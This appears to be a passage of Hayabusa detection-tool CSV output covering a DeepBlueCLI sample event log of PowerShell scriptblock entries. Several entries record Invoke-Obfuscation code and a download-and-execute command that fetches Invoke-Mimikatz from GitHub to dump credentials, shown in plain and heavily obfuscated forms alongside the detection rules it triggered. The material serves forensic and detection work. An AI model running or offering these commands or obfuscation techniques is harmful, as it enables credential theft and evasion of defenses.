'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:56.683 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:56.745 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:16:05.348 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:16:32.699 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,{$_[1].Trim()},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:16:32.703 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:16:32.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:16:37.997 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:39.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent 
@{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:47.492 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:57.725 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:19.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:44.958 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') ((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:50.150 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:05.622 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy 
vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:05.642 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 
0V6PsHome[4]+0V6pshOME[34]+ITGXITG) ((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:25.754 +09:00,SEC511,4104,info,,PwSh 
Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:43.056 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:43.075 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.166 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.171 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.180 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.181 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:44.236 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:46.183 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:46.196 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:19:46.238 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:20:18.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:15.729 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += 